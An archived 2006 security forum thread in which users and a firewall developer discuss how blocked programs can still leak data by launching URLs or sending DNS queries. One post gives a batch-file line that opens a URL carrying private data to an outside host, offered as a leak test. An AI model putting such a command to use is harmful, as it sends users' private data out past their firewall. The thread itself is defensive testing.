Leakage from WMP to svchost.exe to Firefox to internet

Discussion in 'LnS English Forum' started by Pete99, May 4, 2006.

Thread Status:
Not open for further replies.
  1. Pete99

    Pete99 Registered Member

    Joined:
    Apr 21, 2006
    Posts:
    47
    Location:
    U.S.
    I don't know how likely this is, but it seems like it could be a way for malware to send my private information to hackers.

    I'll use WMP as an example since most people have it on their computers, but I think that the same problem exists with any application that "executes" a URL. To determine what was happening, I enabled logging for all applications*. In LnS I blocked WMP from accessing the internet or launching internet applications.

    If I start WMP and choose "Help > Windows Media Player Online", LnS does not show me an alert for WMP, and the logs do not show WMP at all but instead LnS allows svchost.exe and Firefox to access the internet with the URL that WMP created.

    The other strange thing is that even if I block svchost.exe from internet access and launching internet apps, LnS still allows it to send UDP packets to the internet (on port 53). This seems like an even worse problem.

    Can anyone reproduce these things?

    I wonder if these things are related to the fact that my computer fails some of the "official leak tests" after my computer has been running for a while.


    *By the way, I wish that there was an easy way to enable/disable !! logging on the app filtering tab for all apps at the same time.
     
  2. Frederic

    Frederic LnS Developer

    Joined:
    Jan 9, 2003
    Posts:
    4,354
    Location:
    France
    Hi,

    For the specific case of starting an URL, it is normal to have some other application connecting instead of the normal one.
    This is the purpose of the "Starter" leaktests category (Tooleaky, Wallbreaker...) to show these vulnerabilities.
    If the starter really starts the other exe, normally Look 'n' Stop should prompt you as the starter is considered as the parent process.

    For the special case of port 53, this is for DNS resolution, and yes there is the DNSTester leaktest that show the vulnerability when the DNS service is enabled on the PC (when it is not enabled the request are done by the application directly and not relayed with svchost/services).

    Frederic
     
  3. Thomas M

    Thomas M Registered Member

    Joined:
    Jan 12, 2003
    Posts:
    355
    Dear Frederic,
    Would you suggest disabling the "DNS service" (via svchost) for security reasons?

    Regards,
    Thomas
     
  4. Pete99

    Pete99 Registered Member

    Joined:
    Apr 21, 2006
    Posts:
    47
    Location:
    U.S.
    Okay I restarted my computer. Every time that I do that LnS passes copycat/dnstester/pcaudit2.

    After running the three leak tests (LnS passed all of them), I immediately started WMP again. The bad news: WMP was still able to open my browser and load the webpage even though I had blocked WMP and svchost in app filtering. The good news: this time, svchost failed to send any DNS packets.

    So it seems that any app can successfully execute a URL even if we have blocked both the app and svchost in app filtering. Maybe this problem will exist until LnS is enhanced to pass the Wallbreaker leak test (if you ever decide to do that).

    As I think you said, Frederic, the svchost problem seems to be directly related to my problem with dnstester: LnS passes dnstester and blocks svchost DNS packets after I restart my computer but both things fail after a "random" amount of time after the reboot. This subject is probably best discussed in the other topic ("LnS and Leak Tests").
     
  5. Pete99

    Pete99 Registered Member

    Joined:
    Apr 21, 2006
    Posts:
    47
    Location:
    U.S.
    Okay, forget about WMP and svchost for a minute. I can reproduce the problem simply by executing a URL inside a simple batch file. LnS does not prompt me when I run the batch file (nor does Avast or ProcessGuard or Windows Defender).

    To test this you can create a file (e.g. test.bat) with the following line in it and run it:
    Code:
    start http://test.com/script.asp?yourPrivateDataHere
    This bothers me because which of my security apps is supposed to protect me from this attack?

    Is it possible that LnS could detect this (not specific to a .bat file but anytime that an app executes a URL)?
     
  6. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    You're right, none stops it. :cautious: Process Guard does not stop batch files (nor cygwin scripts...), unless they contain commands that have not been "allowed by default". And that's a given. Nor makes a distinction on executables based on the arguments passed to them. Nothing else complains at all on my machine either.

    With Core Force however I was able to restrict cmd.exe and stop the batch script dead in its tracks, but I'm not sure of the implications of this; maybe instructing it to read from a defined set of basic files and set prompt for action to take on others. Maybe. Restricting it might mean initiallly mean quite a lot of trouble, though. I'm not sure this is a "normal" rule that can be enabled by default. :cautious: I'll try and see.
     
    Last edited: May 6, 2006
  7. Pete99

    Pete99 Registered Member

    Joined:
    Apr 21, 2006
    Posts:
    47
    Location:
    U.S.
    Thanks for the info, TNT.

    Well, for what it's worth, I believe that Windows executes a URL in a similar way to how it executes regular programs (via file associations for HTTP in the Registry). I think that you're right that it would cause a lot of trouble if I disabled this file association (e.g. I wouldn't be able to launch my browser from links in my email program).

    I have also tested this with an .exe file, but with the same results.

    However, I've discovered that if Firefox is not running, then LnS *does* prompt me, but not if Firefox is already running. Strange. I hope that there's a fix for this.
     
  8. WSFuser

    WSFuser Registered Member

    Joined:
    Oct 7, 2004
    Posts:
    10,632
    a script blocker could help. one of the best is WormGuard from diamondcs. scriptdefender would also work.
     
  9. Frederic

    Frederic LnS Developer

    Joined:
    Jan 9, 2003
    Posts:
    4,354
    Location:
    France
    This is normal. If the process is already loaded, the parent process is not the one launching the URL but the initial one (probably explorer.exe).
    Look 'n' Stop checks & prompts only on the parent process.

    Frederic
     
  10. Frederic

    Frederic LnS Developer

    Joined:
    Jan 9, 2003
    Posts:
    4,354
    Location:
    France
    Yes, if the DNS method to send information is a real threat, and if you fail DNSTester, then it would safer to disable "DNS Service".

    Frederic
     
  11. Thomas M

    Thomas M Registered Member

    Joined:
    Jan 12, 2003
    Posts:
    355
    Damned :mad:
    I tried deactivating the DNS-service in Windows-XP. For standard internet connections it works good, and now I do pass "DNSTester" :)
    However, now I can not connect to our network printer anymore! Before it required access through "spoolsv.exe" (TCP port 80) and through svchost.exe (UDP port 53).
    My logs don't give me any clue: all printing traffic successfully runs through spoolsv.exe (port 53 and 80), no additional blocked packages in my log file...

    So, either less security or no printing! Great alternatives.... :doubt:

    Thomas
     
  12. Pete99

    Pete99 Registered Member

    Joined:
    Apr 21, 2006
    Posts:
    47
    Location:
    U.S.
    Thanks, WSFuser. I'll investigate those programs.


    Thanks, Frederic. I understand better now.
     
Thread Status:
Not open for further replies.